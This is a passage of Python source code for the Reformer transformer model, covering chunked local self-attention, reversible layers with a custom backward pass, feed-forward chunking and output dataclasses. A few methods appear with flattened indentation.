norm_x = x * torch.rsqrt(variance + epsilon)
return norm_x
def _gather_by_expansion(self, vectors, idxs, num_hashes):
"""
expand dims of idxs and vectors for all hashes and gather
"""
expanded_idxs = idxs.unsqueeze(-1).expand(-1, -1, -1, self.attention_head_size)
vectors = vectors.repeat(1, 1, num_hashes, 1)
return torch.gather(vectors, 2, expanded_idxs)
class ReverseSort(Function):
    """
    Restores the original token ordering after chunked attention has processed
    the bucket-sorted sequence.

    A custom ``torch.autograd.Function`` is needed because the Reformer uses a
    customized backward pass: the gradients of the output vectors have to be
    explicitly re-sorted here.
    """

    @staticmethod
    def forward(ctx, out_vectors, logits, sorted_bucket_idx, undo_sorted_bucket_idx):
        # keep the sort permutation around for the backward pass
        with torch.no_grad():
            ctx.sorted_bucket_idx = sorted_bucket_idx
            # apply the inverse permutation so the next layer sees the original order
            undo_idx_expanded = undo_sorted_bucket_idx.unsqueeze(-1).expand(out_vectors.shape)
            out_vectors = torch.gather(out_vectors, 2, undo_idx_expanded)
            logits = torch.gather(logits, 2, undo_sorted_bucket_idx)
        return out_vectors, logits

    @staticmethod
    def backward(ctx, grad_out_vectors, grad_logits):
        # re-apply the forward sort so gradients flow back to the sorted positions
        sorted_bucket_idx = ctx.sorted_bucket_idx
        sort_idx_expanded = sorted_bucket_idx.unsqueeze(-1).expand(grad_out_vectors.shape)
        grad_out_vectors = torch.gather(grad_out_vectors, 2, sort_idx_expanded)
        grad_logits = torch.gather(grad_logits, 2, sorted_bucket_idx)
        # gradients only for the first two forward inputs; the index args get None
        return grad_out_vectors, grad_logits, None, None
class LocalSelfAttention(nn.Module, EfficientAttentionMixin):
    def __init__(self, config):
        """
        Chunked local self-attention: each position attends within its chunk
        and the configured number of neighbouring chunks.
        """
        super().__init__()
        # chunking hyper-parameters taken from the config
        self.num_attention_heads = config.num_attention_heads
        self.chunk_length = config.local_attn_chunk_length
        self.num_chunks_before = config.local_num_chunks_before
        self.num_chunks_after = config.local_num_chunks_after
        self.is_decoder = config.is_decoder
        self.pad_token_id = config.pad_token_id
        self.attention_head_size = config.attention_head_size
        self.all_head_size = self.num_attention_heads * self.attention_head_size
        self.hidden_size = config.hidden_size
        # projection matrices
        self.query = nn.Linear(self.hidden_size, self.all_head_size, bias=False)
        self.key = nn.Linear(self.hidden_size, self.all_head_size, bias=False)
        self.value = nn.Linear(self.hidden_size, self.all_head_size, bias=False)
        self.dropout = config.local_attention_probs_dropout_prob
        # save mask value here
        self.register_buffer("mask_value_float16", torch.tensor(-1e4))
        self.register_buffer("mask_value_float32", torch.tensor(-1e9))
    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        past_buckets_states=None,
        use_cache=False,
        output_attentions=False,
        **kwargs
    ):
        """
        Compute local (chunked) self-attention over `hidden_states`.

        When `use_cache=True` and hidden states are already cached, only the
        query for the new token is computed and keys/values are built from the
        relevant cached tail.  Sequences no longer than `chunk_length` fall
        back to standard O(n^2) attention.  Returns a
        `LocalSelfAttentionOutput` with the attended hidden states and the
        attention probabilities (empty tuple unless `output_attentions=True`).
        """
        sequence_length = hidden_states.shape[1]
        batch_size = hidden_states.shape[0]
        # check if cache shall be used and that hidden states are already cached
        if use_cache and past_buckets_states[1] is not None:
            assert (
                past_buckets_states[0] is None
            ), "LocalSelfAttention should not make use of `buckets`. There seems to be an error when caching hidden_states_and_buckets."
            key_value_hidden_states = self._retrieve_relevant_hidden_states(
                past_buckets_states[1], self.chunk_length, self.num_chunks_before
            )
            key_value_hidden_states = torch.cat([key_value_hidden_states, hidden_states], dim=1)
            # only query vector for last token
            query_vectors = self.query(hidden_states)
            # compute key and value for relevant chunk
            key_vectors = self.key(key_value_hidden_states)
            value_vectors = self.value(key_value_hidden_states)
            # free memory
            del key_value_hidden_states
        else:
            # project hidden_states to query, key and value
            query_vectors = self.query(hidden_states)
            key_vectors = self.key(hidden_states)
            value_vectors = self.value(hidden_states)
        # split last dim into `config.num_attention_heads` and `config.attention_head_size`
        query_vectors = self._split_hidden_size_dim(query_vectors, self.num_attention_heads, self.attention_head_size)
        key_vectors = self._split_hidden_size_dim(key_vectors, self.num_attention_heads, self.attention_head_size)
        value_vectors = self._split_hidden_size_dim(value_vectors, self.num_attention_heads, self.attention_head_size)
        assert (
            query_vectors.shape[-1] == self.attention_head_size
        ), "last dim of query_key_vectors is {} but should be {}.".format(
            query_vectors.shape[-1], self.attention_head_size
        )
        assert (
            key_vectors.shape[-1] == self.attention_head_size
        ), "last dim of query_key_vectors is {} but should be {}.".format(
            key_vectors.shape[-1], self.attention_head_size
        )
        assert (
            value_vectors.shape[-1] == self.attention_head_size
        ), "last dim of query_key_vectors is {} but should be {}.".format(
            value_vectors.shape[-1], self.attention_head_size
        )
        if self.chunk_length is None:
            assert (
                self.num_chunks_before == 0 and self.num_chunks_after == 0
            ), "If `config.chunk_length` is `None`, make sure `config.num_chunks_after` and `config.num_chunks_before` are set to 0."
        # normalize key vectors
        key_vectors = key_vectors / torch.sqrt(
            torch.tensor(self.attention_head_size, device=key_vectors.device, dtype=key_vectors.dtype)
        )
        # get sequence length indices
        indices = torch.arange(sequence_length, device=query_vectors.device).repeat(
            batch_size, self.num_attention_heads, 1
        )
        # if one should do normal n^2 self-attention
        do_standard_self_attention = sequence_length <= self.chunk_length
        # if input should be chunked
        if not do_standard_self_attention:
            # chunk vectors
            # B x Num_Attn_Head x Seq_Len // chunk_len x chunk_len x attn_head_size
            query_vectors = self._split_seq_length_dim_to(
                query_vectors, -1, self.chunk_length, self.num_attention_heads, self.attention_head_size,
            )
            key_vectors = self._split_seq_length_dim_to(
                key_vectors, -1, self.chunk_length, self.num_attention_heads, self.attention_head_size,
            )
            value_vectors = self._split_seq_length_dim_to(
                value_vectors, -1, self.chunk_length, self.num_attention_heads, self.attention_head_size,
            )
            # chunk indices
            query_indices = self._split_seq_length_dim_to(indices, -1, self.chunk_length, self.num_attention_heads)
            key_indices = self._split_seq_length_dim_to(indices, -1, self.chunk_length, self.num_attention_heads)
            # append chunks before and after
            key_vectors = self._look_adjacent(key_vectors, self.num_chunks_before, self.num_chunks_after)
            value_vectors = self._look_adjacent(value_vectors, self.num_chunks_before, self.num_chunks_after)
            key_indices = self._look_adjacent(key_indices, self.num_chunks_before, self.num_chunks_after)
        else:
            query_indices = key_indices = indices
        # query-key matmul: QK^T
        query_key_dots = torch.matmul(query_vectors, key_vectors.transpose(-1, -2))
        # free memory
        del query_vectors, key_vectors
        mask = self._compute_attn_mask(
            query_indices, key_indices, attention_mask, query_key_dots.shape, do_standard_self_attention
        )
        if mask is not None:
            # get mask tensor depending on half precision or not
            if query_key_dots.dtype == torch.float16:
                mask_value = self.mask_value_float16.half()
            else:
                mask_value = self.mask_value_float32
            query_key_dots = torch.where(mask, query_key_dots, mask_value)
        # free memory
        del mask
        # softmax
        logits = torch.logsumexp(query_key_dots, dim=-1, keepdim=True)
        attention_probs = torch.exp(query_key_dots - logits)
        # free memory
        del logits
        # dropout
        attention_probs = nn.functional.dropout(attention_probs, p=self.dropout, training=self.training)
        # Mask heads if we want to
        if head_mask is not None:
            attention_probs = attention_probs * head_mask
        # attend values
        out_vectors = torch.matmul(attention_probs, value_vectors)
        # free memory
        del value_vectors
        # merge chunk length
        if not do_standard_self_attention:
            out_vectors = out_vectors.flatten(start_dim=2, end_dim=3)
        assert out_vectors.shape == (batch_size, self.num_attention_heads, sequence_length, self.attention_head_size,)
        out_vectors = self._merge_hidden_size_dims(out_vectors, self.num_attention_heads, self.attention_head_size)
        if output_attentions is False:
            attention_probs = ()
        return LocalSelfAttentionOutput(hidden_states=out_vectors, attention_probs=attention_probs)
def _compute_attn_mask(
self, query_indices, key_indices, attention_mask, query_key_dots_shape, do_standard_self_attention
):
# chunk attention mask and look before and after
if attention_mask is not None:
attention_mask = attention_mask.to(torch.uint8)[:, None, :]
if not do_standard_self_attention:
attention_mask = self._split_seq_length_dim_to(attention_mask, -1, self.chunk_length, 1)
attention_mask = self._look_adjacent(attention_mask, self.num_chunks_before, self.num_chunks_after)
# create attn_mask
attention_mask = attention_mask.unsqueeze(-2).expand(query_key_dots_shape)
# Causal mask
if self.is_decoder is True:
causal_mask = torch.ge(query_indices.unsqueeze(-1), key_indices.unsqueeze(-2)).to(query_indices.device)
# add attention mask if not None
if attention_mask is not None:
attention_mask = causal_mask * attention_mask
else:
attention_mask = causal_mask
return attention_mask
@staticmethod
def _retrieve_relevant_hidden_states(previous_hidden_states, chunk_length, num_chunks_before):
start_position = ((previous_hidden_states.shape[1] // chunk_length) - num_chunks_before) * chunk_length
return previous_hidden_states[:, start_position:]
class ReformerSelfOutput(nn.Module):
    """Output projection of the attention block: bias-free dense layer followed by dropout."""

    def __init__(self, config):
        super().__init__()
        all_head_size = config.num_attention_heads * config.attention_head_size
        self.dropout = config.hidden_dropout_prob
        # project the concatenated head outputs back to the model's hidden size
        self.dense = nn.Linear(all_head_size, config.hidden_size, bias=False)

    def forward(self, hidden_states):
        projected = self.dense(hidden_states)
        return nn.functional.dropout(projected, p=self.dropout, training=self.training)
class ReformerAttention(nn.Module):
    """One Reformer attention sub-layer: pre-LayerNorm, an LSH or local self-attention
    (chosen per layer from ``config.attn_layers``), cache handling for incremental
    decoding, and the final output projection."""
    def __init__(self, config, layer_id=0):
        super().__init__()
        self.layer_id = layer_id
        self.attn_layers = config.attn_layers
        self.layer_norm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        # pick this layer's attention implementation from config.attn_layers:
        # either a uniform stack ("lsh" / "local") or a mixed stack indexed by layer_id
        if len(set(self.attn_layers)) == 1 and self.attn_layers[0] == "lsh":
            self.self_attention = LSHSelfAttention(config)
        elif len(set(self.attn_layers)) == 1 and self.attn_layers[0] == "local":
            self.self_attention = LocalSelfAttention(config)
        elif len(set(self.attn_layers)) == 2 and set(self.attn_layers) == set(["lsh", "local"]):
            # get correct attn layers
            if self.attn_layers[self.layer_id] == "lsh":
                self.self_attention = LSHSelfAttention(config)
            else:
                self.self_attention = LocalSelfAttention(config)
        else:
            raise NotImplementedError(
                "Only attn layer types 'lsh' and 'local' exist, but got `config.attn_layers`: {}. Select attn layer types from ['lsh', 'local'] only.".format(
                    self.attn_layers
                )
            )
        self.output = ReformerSelfOutput(config)
    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        num_hashes=None,
        past_buckets_states=None,
        use_cache=False,
        orig_sequence_length=None,
        output_attentions=False,
        buckets=None,
    ):
        """Run pre-norm self-attention, optionally update this layer's (buckets, states)
        cache in-place, and project the attention output.

        Note: ``past_buckets_states`` is the mutable per-layer cache list owned by the
        encoder; when ``use_cache`` is True this method writes the updated entry back
        into ``past_buckets_states[self.layer_id]`` as a side effect.
        """
        hidden_states = self.layer_norm(hidden_states)
        # make sure cached hidden states is set to None for backward pass
        if past_buckets_states is not None:
            past_buckets_states_layer = past_buckets_states[self.layer_id]
        else:
            past_buckets_states_layer = None
        # use cached buckets for backprob if buckets not None for LSHSelfAttention
        self_attention_outputs = self.self_attention(
            hidden_states=hidden_states,
            head_mask=head_mask,
            attention_mask=attention_mask,
            num_hashes=num_hashes,
            past_buckets_states=past_buckets_states_layer,
            use_cache=use_cache,
            output_attentions=output_attentions,
            buckets=buckets,
        )
        # add buckets if necessary (only the LSH attention output carries buckets)
        if hasattr(self_attention_outputs, "buckets"):
            buckets = self_attention_outputs.buckets
        else:
            buckets = None
        # cache hidden states (and buckets) for future sequential decoding steps
        if use_cache:
            if past_buckets_states[self.layer_id][0] is None:
                # padded input should not be cached
                past_buckets = (
                    buckets[:, :, :, :orig_sequence_length]
                    if (buckets is not None and orig_sequence_length > 1)
                    else buckets
                )
            else:
                past_buckets = torch.cat([past_buckets_states[self.layer_id][0], buckets], dim=-1)
            if past_buckets_states[self.layer_id][1] is None:
                # padded input should not be cached
                past_states = hidden_states[:, :orig_sequence_length]
            else:
                past_states = torch.cat([past_buckets_states[self.layer_id][1], hidden_states], dim=1)
            past_buckets_states[self.layer_id] = (past_buckets, past_states)
        # compute attention feed forward output
        attention_output = self.output(self_attention_outputs.hidden_states)
        return AttentionOutput(
            hidden_states=attention_output, attention_probs=self_attention_outputs.attention_probs, buckets=buckets,
        )
class ReformerFeedForwardDense(nn.Module):
    """Expanding linear layer of the feed-forward block: dense -> dropout -> activation."""

    def __init__(self, config):
        super().__init__()
        self.dropout = config.hidden_dropout_prob
        # config.hidden_act may be an activation name (looked up in ACT2FN) or a callable
        self.act_fn = ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
        self.dense = nn.Linear(config.hidden_size, config.feed_forward_size)

    def forward(self, hidden_states):
        """Project to the feed-forward size, apply dropout, then the activation."""
        projected = self.dense(hidden_states)
        projected = nn.functional.dropout(projected, p=self.dropout, training=self.training)
        return self.act_fn(projected)
class ReformerFeedForwardOutput(nn.Module):
    """Contracting linear layer of the feed-forward block: dense -> dropout."""

    def __init__(self, config):
        super().__init__()
        self.dropout = config.hidden_dropout_prob
        self.dense = nn.Linear(config.feed_forward_size, config.hidden_size)

    def forward(self, hidden_states):
        """Project back down to the model hidden size and apply dropout."""
        projected = self.dense(hidden_states)
        return nn.functional.dropout(projected, p=self.dropout, training=self.training)
class ChunkReformerFeedForward(nn.Module):
    """LayerNorm + two-layer feed-forward, applied chunk-wise along the sequence axis
    to bound peak memory usage."""

    def __init__(self, config):
        super().__init__()
        self.chunk_size_feed_forward = config.chunk_size_feed_forward
        # chunking is done over dimension 1 (the sequence dimension)
        self.seq_len_dim = 1
        self.layer_norm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.dense = ReformerFeedForwardDense(config)
        self.output = ReformerFeedForwardOutput(config)

    def forward(self, attention_output):
        """Run `forward_chunk` over sequence chunks of size `chunk_size_feed_forward`."""
        return apply_chunking_to_forward(
            self.chunk_size_feed_forward, self.seq_len_dim, self.forward_chunk, attention_output,
        )

    def forward_chunk(self, hidden_states):
        """Normalize, expand, then contract one chunk of hidden states."""
        normed = self.layer_norm(hidden_states)
        expanded = self.dense(normed)
        return self.output(expanded)
class ReformerLayer(nn.Module):
    """One reversible (RevNet-style) Reformer block pairing an attention sub-layer ``f``
    with a chunked feed-forward sub-layer ``g``:
        Y_1 = X_1 + f(X_2)   and   Y_2 = X_2 + g(Y_1)
    Activations are not stored for backward; ``backward_pass`` recomputes them,
    replaying dropout deterministically via the RNG seeds saved in ``forward``."""
    def __init__(self, config, layer_id=0):
        super().__init__()
        self.attention = ReformerAttention(config, layer_id)
        # dropout requires to have the same
        # seed for forward and backward pass
        self.attention_seed = None
        self.feed_forward_seed = None
        self.feed_forward = ChunkReformerFeedForward(config)
    def _init_attention_seed(self):
        """
        This function sets a new seed for the
        attention layer to make dropout deterministic
        for both forward calls: 1 normal forward
        call and 1 forward call in backward
        to recalculate activations.
        """
        # randomize seeds
        # use cuda generator if available
        if len(torch.cuda.default_generators) > 0:
            # GPU
            device_idx = torch.cuda.current_device()
            self.attention_seed = torch.cuda.default_generators[device_idx].seed()
        else:
            # CPU
            self.attention_seed = int(torch.seed() % sys.maxsize)
        torch.manual_seed(self.attention_seed)
    def _init_feed_forward_seed(self):
        """
        This function sets a new seed for the
        feed forward layer to make dropout deterministic
        for both forward calls: 1 normal forward
        call and 1 forward call in backward
        to recalculate activations.
        """
        # randomize seeds
        # use cuda generator if available
        if len(torch.cuda.default_generators) > 0:
            # GPU
            device_idx = torch.cuda.current_device()
            self.feed_forward_seed = torch.cuda.default_generators[device_idx].seed()
        else:
            # CPU
            self.feed_forward_seed = int(torch.seed() % sys.maxsize)
        torch.manual_seed(self.feed_forward_seed)
    def forward(
        self,
        prev_attn_output,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        num_hashes=None,
        past_buckets_states=None,
        use_cache=False,
        orig_sequence_length=None,
        output_attentions=False,
    ):
        """Reversible forward step. Runs under ``no_grad`` on purpose: gradients are
        reconstructed later by ``backward_pass`` (driven by ``_ReversibleFunction``)."""
        with torch.no_grad():
            # every forward pass we sample a different seed
            # for dropout and save for forward fn in backward pass
            # to have correct dropout
            self._init_attention_seed()
            attn_outputs = self.attention(
                hidden_states=hidden_states,
                head_mask=head_mask,
                attention_mask=attention_mask,
                num_hashes=num_hashes,
                past_buckets_states=past_buckets_states,
                use_cache=use_cache,
                orig_sequence_length=orig_sequence_length,
                output_attentions=output_attentions,
            )
            attn_output = attn_outputs.hidden_states
            # Implementation of RevNet (see Fig. 6 in https://towardsdatascience.com/illustrating-the-reformer-393575ac6ba0)
            # Y_1 = X_1 + f(X_2)
            attn_output = prev_attn_output + attn_output
            # free memory
            del prev_attn_output
            # every forward pass we sample a different seed
            # for dropout and save seed for forward fn in backward
            # to have correct dropout
            self._init_feed_forward_seed()
            # Y_2 = X_2 + g(Y_1)
            hidden_states = hidden_states + self.feed_forward(attn_output)
        return ReformerOutput(
            attn_output=attn_output,
            hidden_states=hidden_states,
            attention_probs=attn_outputs.attention_probs,
            buckets=attn_outputs.buckets,
        )
    def backward_pass(
        self,
        next_attn_output,
        hidden_states,
        grad_attn_output,
        grad_hidden_states,
        attention_mask=None,
        head_mask=None,
        buckets=None,
    ):
        """Invert the reversible step: recover (X_1, X_2) from (Y_1, Y_2) while
        accumulating their gradients, re-running ``g`` and ``f`` with the seeds
        saved during ``forward`` so dropout matches exactly."""
        # Implements the backward pass for reversible ResNets.
        # A good blog post on how this works can be found here:
        # Implementation of RevNet (see Fig. 6 in https://towardsdatascience.com/illustrating-the-reformer-393575ac6ba0)
        # This code is heavily inspired by https://github.com/lucidrains/reformer-pytorch/blob/master/reformer_pytorch/reversible.py
        with torch.enable_grad():
            next_attn_output.requires_grad = True
            # set seed to have correct dropout
            torch.manual_seed(self.feed_forward_seed)
            # g(Y_1)
            res_hidden_states = self.feed_forward(next_attn_output)
            res_hidden_states.backward(grad_hidden_states, retain_graph=True)
        with torch.no_grad():
            # X_2 = Y_2 - g(Y_1)
            hidden_states = hidden_states - res_hidden_states
            del res_hidden_states
            grad_attn_output = grad_attn_output + next_attn_output.grad
            next_attn_output.grad = None
        with torch.enable_grad():
            hidden_states.requires_grad = True
            # set seed to have correct dropout
            torch.manual_seed(self.attention_seed)
            # f(X_2)
            # use cached buckets for backprob if buckets not None for LSHSelfAttention
            output = self.attention(
                hidden_states=hidden_states, head_mask=head_mask, attention_mask=attention_mask, buckets=buckets,
            ).hidden_states
            output.backward(grad_attn_output, retain_graph=True)
        with torch.no_grad():
            # X_1 = Y_1 - f(X_2)
            attn_output = next_attn_output - output
            del output, next_attn_output
            grad_hidden_states = grad_hidden_states + hidden_states.grad
            hidden_states.grad = None
            hidden_states = hidden_states.detach()
        return ReformerBackwardOutput(
            attn_output=attn_output,
            hidden_states=hidden_states,
            grad_attn_output=grad_attn_output,
            grad_hidden_states=grad_hidden_states,
        )
class _ReversibleFunction(Function):
    """
    To prevent PyTorch from performing the usual backpropagation,
    a customized backward function is implemented here. This way
    it is made sure that no memory expensive activations are
    saved during the forward pass.
    This function is heavily inspired by https://github.com/lucidrains/reformer-pytorch/blob/master/reformer_pytorch/reversible.py
    """
    @staticmethod
    def forward(
        ctx,
        hidden_states,
        layers,
        attention_mask,
        head_mask,
        num_hashes,
        all_hidden_states,
        all_attentions,
        past_buckets_states,
        use_cache,
        orig_sequence_length,
        output_hidden_states,
        output_attentions,
    ):
        """Run all reversible layers. Only the final pair of residual streams is
        saved on ``ctx``; intermediate activations are recomputed in ``backward``.
        ``all_hidden_states`` / ``all_attentions`` are caller-owned lists filled
        in-place as a side effect when the corresponding flags are True."""
        all_buckets = ()
        # split duplicated tensor into the two residual streams (X_1, X_2)
        hidden_states, attn_output = torch.chunk(hidden_states, 2, dim=-1)
        for layer_id, (layer, layer_head_mask) in enumerate(zip(layers, head_mask)):
            if output_hidden_states is True:
                all_hidden_states.append(hidden_states)
            layer_outputs = layer(
                prev_attn_output=attn_output,
                hidden_states=hidden_states,
                attention_mask=attention_mask,
                head_mask=layer_head_mask,
                num_hashes=num_hashes,
                past_buckets_states=past_buckets_states,
                use_cache=use_cache,
                orig_sequence_length=orig_sequence_length,
                output_attentions=output_attentions,
            )
            attn_output = layer_outputs.attn_output
            hidden_states = layer_outputs.hidden_states
            # stack per-layer buckets so backward can replay LSH attention exactly
            all_buckets = all_buckets + (layer_outputs.buckets,)
            if output_attentions:
                all_attentions.append(layer_outputs.attention_probs)
        # Add last layer
        if output_hidden_states is True:
            all_hidden_states.append(hidden_states)
        # attach params to ctx for backward
        ctx.save_for_backward(attn_output.detach(), hidden_states.detach())
        ctx.layers = layers
        ctx.all_buckets = all_buckets
        ctx.head_mask = head_mask
        ctx.attention_mask = attention_mask
        # Concatenate 2 RevNet outputs
        return torch.cat([attn_output, hidden_states], dim=-1)
    @staticmethod
    def backward(ctx, grad_hidden_states):
        """Walk the layers in reverse, reconstructing activations and gradients
        layer by layer via ``ReformerLayer.backward_pass``."""
        grad_attn_output, grad_hidden_states = torch.chunk(grad_hidden_states, 2, dim=-1)
        # retrieve params from ctx for backward
        attn_output, hidden_states = ctx.saved_tensors
        # create tuple
        output = ReformerBackwardOutput(
            attn_output=attn_output,
            hidden_states=hidden_states,
            grad_attn_output=grad_attn_output,
            grad_hidden_states=grad_hidden_states,
        )
        # free memory
        del grad_attn_output, grad_hidden_states, attn_output, hidden_states
        layers = ctx.layers
        all_buckets = ctx.all_buckets
        head_mask = ctx.head_mask
        attention_mask = ctx.attention_mask
        for idx, layer in enumerate(layers[::-1]):
            # pop last buckets from stack
            buckets = all_buckets[-1]
            all_buckets = all_buckets[:-1]
            # backprop
            output = layer.backward_pass(
                next_attn_output=output.attn_output,
                hidden_states=output.hidden_states,
                grad_attn_output=output.grad_attn_output,
                grad_hidden_states=output.grad_hidden_states,
                head_mask=head_mask[len(layers) - idx - 1],
                attention_mask=attention_mask,
                buckets=buckets,
            )
        assert all_buckets == (), "buckets have to be empty after backpropagation"
        grad_hidden_states = torch.cat([output.grad_attn_output, output.grad_hidden_states], dim=-1)
        # num of return vars has to match num of forward() args
        # return gradient for hidden_states arg and None for other args
        return grad_hidden_states, None, None, None, None, None, None, None, None, None, None, None
class ReformerEncoder(nn.Module):
    """Stack of reversible Reformer layers followed by LayerNorm and dropout.

    Because the layers are reversible (RevNet-style), the stack carries two residual
    streams whose concatenation is the final output, so the closing LayerNorm
    operates over ``2 * hidden_size``.
    """

    def __init__(self, config):
        super().__init__()
        self.dropout = config.hidden_dropout_prob
        self.layers = nn.ModuleList([ReformerLayer(config, i) for i in range(config.num_hidden_layers)])
        self.layer_norm = nn.LayerNorm(2 * config.hidden_size, eps=config.layer_norm_eps)

    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        num_hashes=None,
        past_buckets_states=None,
        use_cache=False,
        orig_sequence_length=None,
        output_hidden_states=False,
        output_attentions=False,
    ):
        """Run the reversible stack and return a `ReformerEncoderOutput`."""
        # filled in-place by _ReversibleFunction when the corresponding flags are set
        all_hidden_states = []
        all_attentions = []

        # lazily create one empty (buckets, states) cache slot per layer
        if past_buckets_states is None:
            past_buckets_states = [((None), (None)) for i in range(len(self.layers))]

        # duplicate the input so both reversible residual streams start identical
        concat_states = torch.cat([hidden_states, hidden_states], dim=-1)
        concat_states = _ReversibleFunction.apply(
            concat_states,
            self.layers,
            attention_mask,
            head_mask,
            num_hashes,
            all_hidden_states,
            all_attentions,
            past_buckets_states,
            use_cache,
            orig_sequence_length,
            output_hidden_states,
            output_attentions,
        )

        # normalize the concatenated streams, then apply dropout
        normed_states = self.layer_norm(concat_states)
        normed_states = nn.functional.dropout(normed_states, p=self.dropout, training=self.training)

        return ReformerEncoderOutput(
            hidden_states=normed_states,
            all_hidden_states=all_hidden_states,
            all_attentions=all_attentions,
            past_buckets_states=past_buckets_states,
        )
class ReformerOnlyLMHead(nn.Module):
    """Language-modeling head mapping the concatenated RevNet output to vocabulary logits."""

    def __init__(self, config):
        super().__init__()
        # the encoder concatenates both reversible residual streams -> 2 * hidden_size input
        self.seq_len_dim = 1
        self.chunk_size_lm_head = config.chunk_size_lm_head
        self.decoder = nn.Linear(2 * config.hidden_size, config.vocab_size, bias=False)
        self.bias = nn.Parameter(torch.zeros(config.vocab_size))
        # Need a link between the two variables so that the bias is correctly resized with `resize_token_embeddings`
        self.decoder.bias = self.bias

    def forward(self, hidden_states):
        """Compute logits chunk-by-chunk along the sequence dimension."""
        return apply_chunking_to_forward(self.chunk_size_lm_head, self.seq_len_dim, self.forward_chunk, hidden_states)

    def forward_chunk(self, hidden_states):
        """Project one chunk of hidden states to vocabulary logits."""
        return self.decoder(hidden_states)
class ReformerPreTrainedModel(PreTrainedModel):
    """ An abstract class to handle weights initialization and
        a simple interface for downloading and loading pretrained models.
    """

    config_class = ReformerConfig
    base_model_prefix = "reformer"

    @property
    def dummy_inputs(self):
        """Minimal input dict (ids + mask) used e.g. for tracing."""
        return {
            "input_ids": torch.tensor(DUMMY_INPUTS),
            "attention_mask": torch.tensor(DUMMY_MASK),
        }

    def _init_weights(self, module):
        """ Initialize the weights """
        if isinstance(module, AxialPositionEmbeddings):
            # axial position embeddings hold one weight tensor per axis
            for weight in module.weights:
                torch.nn.init.normal_(weight, std=self.config.axial_norm_std)
        elif isinstance(module, nn.Embedding):
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
        elif isinstance(module, nn.Linear):
            # Slightly different from the TF version which uses truncated_normal for initialization
            # cf https://github.com/pytorch/pytorch/pull/5617
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
        elif isinstance(module, nn.LayerNorm):
            module.bias.data.zero_()
            module.weight.data.fill_(1.0)
        # linear biases are always zeroed, regardless of which branch above ran
        if isinstance(module, nn.Linear) and module.bias is not None:
            module.bias.data.zero_()
@dataclass
class ReformerModelOutput(ModelOutput):
    """
    Output type of :class:`~transformers.ReformerModel`.
    Args:
        last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, 2 * hidden_size)`):
            Sequence of hidden-states at the last layer of the model.
            The feature dimension is ``2 * hidden_size`` because the reversible encoder
            concatenates its two residual streams before the final layer norm.
        past_buckets_states (:obj:`List[Tuple(torch.LongTensor, torch.FloatTensor)]`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
            List of :obj:`tuple(torch.LongTensor, torch.FloatTensor` of length :obj:`config.n_layers`, with :obj:`tuple(0)` being the previous `buckets` of shape
            :obj:`(batch_size, num_heads, num_hashes, sequence_length)`)
            and :obj:`tuple(1)` being the previous `hidden_states` of shape
            :obj:`(batch_size, sequence_length, hidden_size)`).
            Contains pre-computed buckets and hidden-states that can be used (see
            ``past_buckets_states`` input) to speed up sequential decoding.
        hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
            Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
            of shape :obj:`(batch_size, sequence_length, hidden_size)`.
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
            Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
            :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
            heads.
    """
    last_hidden_state: torch.FloatTensor
    past_buckets_states: Optional[List[Tuple[torch.LongTensor, torch.FloatTensor]]] = None
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    attentions: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
class ReformerModelWithLMHeadOutput(ModelOutput):
    """
    Output type of :class:`~transformers.ReformerModelWithLMHead`.
    Args:
        loss (:obj:`torch.FloatTensor` of shape `(1,)`, `optional`, returned when ``labels`` is provided)
            Language modeling loss (for next-token prediction).
        logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`):
            Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
        past_buckets_states (:obj:`List[Tuple(torch.LongTensor, torch.FloatTensor)]`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
            List of :obj:`tuple(torch.LongTensor, torch.FloatTensor` of length :obj:`config.n_layers`, with :obj:`tuple(0)` being the previous `buckets` of shape
            :obj:`(batch_size, num_heads, num_hashes, sequence_length)`)
            and :obj:`tuple(1)` being the previous `hidden_states` of shape
            :obj:`(batch_size, sequence_length, hidden_size)`).
            Contains pre-computed buckets and hidden-states that can be used (see
            ``past_buckets_states`` input) to speed up sequential decoding.
        hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
            Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
            of shape :obj:`(batch_size, sequence_length, hidden_size)`.
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
            Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
            :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
            heads.
    """
    loss: Optional[torch.FloatTensor] = None
    logits: torch.FloatTensor = None
    past_buckets_states: Optional[List[Tuple[torch.LongTensor, torch.FloatTensor]]] = None
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    attentions: Optional[Tuple[torch.FloatTensor]] = None
# Class-level docstring prefix shared by all Reformer model classes below.
# NOTE: the arXiv id was previously a broken link ("2001.0445"); the paper is arXiv:2001.04451.
